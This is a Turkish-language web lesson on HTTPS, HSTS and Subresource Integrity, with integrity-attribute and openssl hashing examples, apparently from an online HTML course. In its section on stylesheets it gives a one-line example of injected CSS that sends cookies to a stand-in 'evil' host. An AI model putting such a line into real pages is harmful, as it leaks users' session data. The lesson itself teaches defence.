0Pricing
HTML Academy · Ders

HTTPS ve Alt Kaynak Bütünlüğü

Harici kaynakların bütünlüğünü integrity özniteliğiyle doğrulayın

HTTPS ve Alt Kaynak Bütünlüğü, CoddyKit'te ücretsiz bir HTML Academy dersidir. Bu, 4 dersinin 4. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, HTML Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. HTML Academy kursu toplamda 4 dersten oluşur.

HTTPS Neden Her Yerde Kullanılmalı

HTTPS, aktarım sırasında verileri şifreler ve sunucunun kimliğini doğrular. HTTPS olmadan aynı ağdaki saldırganlar (kafe Wi-Fi'si, ISP, devlet aktörü) her baytı okuyabilir ve yanıtlara kötü amaçlı içerik enjekte edebilir. Modern tarayıcılar HTTP sayfalarını "Güvenli Değil" olarak işaretler ve birçok arayüz (kamera, coğrafi konum, hizmet çalışanları) HTTP üzerinden çalışmayı reddeder.

Karma İçerik

HTTPS kullanan bir sayfadan HTTP kaynakları yüklemek karma içerik oluşturur. Tarayıcı etkin karma içeriği (betikler, gömülü çerçeveler, stil sayfaları) doğrudan engeller ve pasif içerik (görseller) hakkında uyarır. Her kaynağı her zaman HTTPS üzerinden yükleyin; protokole göre değişen adresler (//cdn.example.com) veya mutlak https:// kullanın.

HSTS

Strict-Transport-Security yanıt üst bilgisi aracılığıyla HTTP Katı Aktarım Güvenliği, tarayıcılara gelecekte alanınıza yönelik HTTP bağlantılarını reddetmelerini söyler. HSTS önbelleğe alındıktan sonra saldırgan, araya giren saldırgan konumunda olsa bile kullanıcıyı HTTP'ye düşüremez.

SRI Neden Gerekli?

Üçüncü taraf CDN'lerinden betik yüklemek kullanışlıdır ancak risklidir; CDN ele geçirilirse saldırgan betiği kötü amaçlı yazılımla değiştirebilir. Alt Kaynak Bütünlüğü (SRI), çalıştırmadan önce tarayıcının dosyanın kriptografik karma değerini doğrulamasını sağlar; karma eşleşmezse dosyayı çalıştırmayı reddeder.

Bütünlük Özniteliği

Betik etiketine base64 ile kodlanmış bir SHA-256/384/512 karması ekleyin: <script src="https://cdn.example.com/lib.js" integrity="sha384-..." crossorigin="anonymous"></script>. Tarayıcı indirilen dosyanın karma değerini hesaplar ve uyuşmazlık durumunda dosyayı çalıştırmayı reddeder.

<link
  rel="stylesheet"
  href="https://cdn.example.com/styles.css"
  integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh"
  crossorigin="anonymous">

Karma Değerleri Oluşturma

Karma değerini openssl ile oluşturun: openssl dgst -sha384 -binary file.js | openssl base64 -A. Alternatif olarak bütünlük özniteliğini otomatik olarak üreten bir derleme aracı eklentisi kullanın. Çoğu CDN (jsdelivr, unpkg), kopyalayıp yapıştırabileceğiniz kod parçasında SRI etiketini gösterir.

Kaynaklar Arası Doğrulama Gereklidir

SRI, kaynaklar arası yanıtın CORS aracılığıyla bütünlük denetimine izin vermesini gerektirir. Etikete crossorigin="anonymous" ekleyin ve CDN'nin Access-Control-Allow-Origin göndermesini sağlayın. Bu olmadan tarayıcı doğrulamayı reddeder ve kaynak yüklenemez.

Birden Çok Karma

Bütünlük özniteliği, boşluklarla ayrılmış birden çok karma değeri taşıyabilir. Bu, sürüm geçişi sırasında kullanışlıdır: hem eski hem de yeni sürümün karma değerlerini listeleyin; tarayıcı CDN'nin sunduğu sürümlerden hangisi olursa olsun kabul eder. Özniteliğin okunabilir kalması için birkaç karmadan fazlasını kullanmayın.

Stil Sayfaları İçin SRI

SRI, <link rel="stylesheet"> öğesini de korur. Güvenliği ihlal edilmiş bir CSS dosyası, güvenliği ihlal edilmiş bir betik kadar doğrudan tehlikeli değildir; ancak enjekte edilen background: url("//evil/log?cookie=...") yine de verileri dışarı sızdırabilir. Mümkün olan her yerde tüm harici varlıklara SRI uygulayın.

Çoğu Zaman Kendi Sunucunuzda Barındırmak Daha İyidir

SRI, CDN'nin ele geçirilmesi riskini azaltır ancak her sorunu çözmez: CDN'deki karma değeri değişirse siz bütünlük özniteliğini güncelleyene kadar sayfanız çalışmaz. Kritik kütüphaneler için incelediğiniz dosyayı kendi sunucunuzda barındırın; böylece SRI sabitlemesini ve tedarik zinciri riskini tek hamlede ortadan kaldırırsınız.

Performans

SRI, her kaynak için bir karma hesaplaması ekler; modern donanımlarda bu, kilobayt başına mikrosaniyeler düzeyinde ve ihmal edilebilir bir maliyettir. Tedarik zinciri saldırılarına karşı sağladığı koruma bu maliyeti fazlasıyla aşar. CDN'den yükleme yaparken SRI'yi atlamak için performansa dayalı bir gerekçe yoktur.

Sınırlamalar

SRI belirli baytları doğrular; CDN'nin bazı kullanıcılara farklı bir dosya sunmasına karşı koruma sağlamaz (seçici hedefleme). En yüksek güvence için SRI'yi HTTPS, HSTS, CSP ve en kritik varlıkları kendi sunucunuzda barındırma ile birleştirin.

Bilginizi Sınayın

Bir betik etiketindeki bütünlük özniteliği neye karşı koruma sağlar?

Özet

HTTPS şifreler ve kimlik doğrular, HSTS sürüm düşürme saldırılarını önler ve SRI üçüncü taraf dosyalarının değiştirilmediğini doğrular. Denetlemediğiniz bir CDN'den gelen her harici betiğe ve stil sayfasına bütünlük karmaları (crossorigin="anonymous" ile birlikte) ekleyin. En kritik varlıklar için bunun yerine kendi sunucunuzda barındırın; böylece tedarik zinciri riskini tamamen ortadan kaldırırsınız.

Sıkça Sorulan Sorular

“HTTPS ve Alt Kaynak Bütünlüğü” dersi ücretsiz mi?

Evet — “HTTPS ve Alt Kaynak Bütünlüğü” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve HTML Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. HTML Academy kursu toplamda 4 dersten oluşur.

“HTTPS ve Alt Kaynak Bütünlüğü” dersinde ne öğreneceğim?

Harici kaynakların bütünlüğünü integrity özniteliğiyle doğrulayın HTML Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.

HTML Academy öğrenmeye başlamak için deneyim gerekli mi?

Önceden deneyim gerekmez. CoddyKit'te HTML Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 4. dersidir.

“HTTPS ve Alt Kaynak Bütünlüğü” dersi ne kadar sürer?

Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.

Bu HTML Academy dersinde kod yazıp çalıştırabilir miyim?

Evet. Her HTML Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.

Bu kursun tüm dersleri

  1. İçerik Güvenliği İlkesi: meta http-equiv
  2. innerHTML ile XSS ve Bunu Önleme
  3. iframe Korumalı Alanı ve İzinler İlkesi
  4. HTTPS ve Alt Kaynak Bütünlüğü
← HTML Academy Sayfasına Dön